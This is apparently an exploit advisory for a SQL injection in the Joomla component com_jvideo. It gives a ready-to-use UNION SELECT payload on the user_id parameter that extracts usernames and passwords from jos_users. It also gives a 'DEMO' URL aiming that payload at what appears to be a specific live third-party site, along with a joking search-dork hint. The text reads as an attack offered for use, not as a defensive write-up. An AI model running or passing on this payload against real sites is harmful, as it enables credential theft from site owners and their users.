++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jvideo (user_id) SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Greetz : d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0 [+] Vulnerability : SQL injection [+] Google Dork : imagine ;) -------------------------------------------------- author : Russell... author Email : chipdebios[alt+64]gmail.com ################################################### Example: http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code] SQL code: +and+1=2+union+select+concat(username,0x3a,password)+from+jos_users DEMO: http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users etc, etc.... +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ JVideo! September 2008 Infinovision.com team@infinovision.com http://www.infinovision.com Copyright 2008 Infinovision.com http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL 0.3.11c Beta JVideo! Component